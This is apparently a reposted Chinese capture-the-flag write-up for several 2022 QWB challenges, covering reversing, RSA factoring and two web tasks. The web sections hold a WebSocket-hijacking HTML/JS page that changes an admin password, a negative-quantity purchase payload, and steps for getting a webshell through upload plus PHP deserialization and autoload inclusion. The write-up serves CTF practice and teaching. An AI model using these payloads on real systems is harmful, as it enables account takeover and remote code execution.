签到

图形用户界面, 应用程序

描述已自动生成

打开得到flag

Falg= flag{we1come_t0_qwb_s6}

Game Master

21点游戏

和打游戏没有太多关系

直接分析重要的函数goldFunc就可以看到是异或 + AES

文本

描述已自动生成

图形用户界面

描述已自动生成

然后对我们的文件进行解密

图形用户界面, 应用程序

描述已自动生成

解密的时候可以吧前面没用的东西删除掉

又得到一个C#

然后解密

图形用户界面, 文本, 应用程序

描述已自动生成

有几个字节对不上,根据题目名称补全得到flag

Flag=flag{ Y0u_@re_G3meM3s7er!}

ASR

N先在factordb开根,然后用yafu分解

文本

描述已自动生成

运行得到flag

图形用户界面, 文本, 应用程序

描述已自动生成

Flag=flag{Fear_can_hold_you_prisconer_Hope_can_set_you_free}

babyweb

注册一个账号登录进去,help一下

图形用户界面, 文本, 应用程序, 电子邮件

描述已自动生成

有一个机器人,他有一个bugreport指令去访问url包括自己的服务器,工具help发现有bugreport http://host:port/login

想到可以劫持登陆的时候有一个admin账户

在自己服务器构造一个能修改admin密码的js文件,通过指令去访问这个页面

然后用admin登录就行了

使用自己服务器构造一个劫持

<html>

<script>

var url = “ws://” + “127.0.0.1:8888” + “/bot”;

var ws = new WebSocket(url);

ws.onopen = function(e) {

ws.send(“changepw 123456”);

}

</script>

</html>

图形用户界面, 文本, 应用程序

描述已自动生成

退出登录admin

图形用户界面

描述已自动生成

可以买flag但是前不够,先买一个提示看看

购买提示给了两个文件,一个是机器人的py文件,一个是交易的go文件,

分析go文件发现可以构造导致溢出,得到flag

使用burp抓包,构造溢出语句,将原来的购买语句改了

{“product”:[{“id”:1,”num”:0},{“id”:2,”num”:-1}],

“product”:[{“id”:1,”num”:0},{“id”:2,”num”:0}]}

1659169388112

最后发包,回到页面,得到flag

rcefile

由题目名称得知该题为web中的文件上传题

  1. 首先使用dirsearch对其提供的web地址进行扫描看看有哪些目录文件

图形用户界面, 文本

描述已自动生成

发现其网站下面有以下几个重要目录文件

  1. 下载www.zip这个源码文件

图形用户界面, 文本, 应用程序

描述已自动生成

对其upload.php内容进行查看

可以看到

1)限制了文件上传的大小,文件上传的类型,文件后缀有黑名单检测,

2)以及对返回的文件名进行了随机字符串md5加密

图形用户界面, 文本, 应用程序

描述已自动生成

剩下的文件config.inc.php中

图形用户界面, 文本, 应用程序

描述已自动生成

数据存储于cookie中,通过php反序列化函数还原并显示

同时包含spl_autoload_ register函数,这个函数是自动注册类用的,在当今特别是新型的框架(laravel、composer)中常用。

这个函数有个特点,如果不指定处理用的函数,就会自动包含“类名.php”或“类名.inc”的文件,并加载其中的“类名”类。

而之前的黑名单是不包括“.inc”文件的,

所以我们可以按照下面方法进行getshell:

1.上传webshell,后缀为.inc,被重命名为a181e810daa28a1ccc9058f88b9d24d2.inc

图形用户界面, 文本, 应用程序, Word

描述已自动生成

  1. 序列化一个类名为a181e810daa28a1ccc9058f88b9d24d2的类对象

图形用户界面, 文本, 应用程序, 电子邮件

描述已自动生成

  1. 将序列化以后的字符串作为cookie,发送到服务器上

图形用户界面, 应用程序, Word

描述已自动生成

图形用户界面, 文本, 应用程序

描述已自动生成

4.服务器反序列化这个字符串后,将会自动加载a181e810daa28a1ccc9058f88b9d24d2类,由于之前spl_autoload_register函数注册的方法,会自动加载a181e810daa28a1ccc9058f88b9d24d2.inc,从而造成文件包含漏洞,getshell成功

图片包含 图形用户界面

描述已自动生成

在其目录下发现flag文件

图形用户界面, 文本, 应用程序

描述已自动生成

方法二:黑名单后缀的绕过

上传文件后缀.phar的一句话木马,访问files目录解析后蚁剑连接

Factor

第一部分羊城杯的一个题目变形尝试对 *N*1*N*2 进行连分数展开并求其各项渐进的分数

记为 *t**i**s**i* 并验证 *N*1%*t**k*==0 是不是成立,如果是成立的,那么 *q*1=*t**k*,*q*2=*s**k*

成功可以分解n11,n12.第二部分,第三部分则是d^3ctf一道题目的变形

可以按照那个道题的方法分开构造两个等式即可成功分解得到flag

这边我是在github上拿的已经构造好的脚本改了改

文本

描述已自动生成

得到FLAG

flag = qwb{8633ce6d-fece-4cf1-8f0f-f27e5bf6d678}

原文地址:http://www.cnblogs.com/rule-linux/p/16919711.html

1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长! 2. 分享目的仅供大家学习和交流,请务用于商业用途! 3. 如果你也有好源码或者教程,可以到用户中心发布,分享有积分奖励和额外收入! 4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解! 5. 如有链接无法下载、失效或广告,请联系管理员处理! 6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需! 7. 如遇到加密压缩包,默认解压密码为"gltf",如遇到无法解压的请联系管理员! 8. 因为资源和程序源码均为可复制品,所以不支持任何理由的退款兑现,请斟酌后支付下载 声明:如果标题没有注明"已测试"或者"测试可用"等字样的资源源码均未经过站长测试.特别注意没有标注的源码不保证任何可用性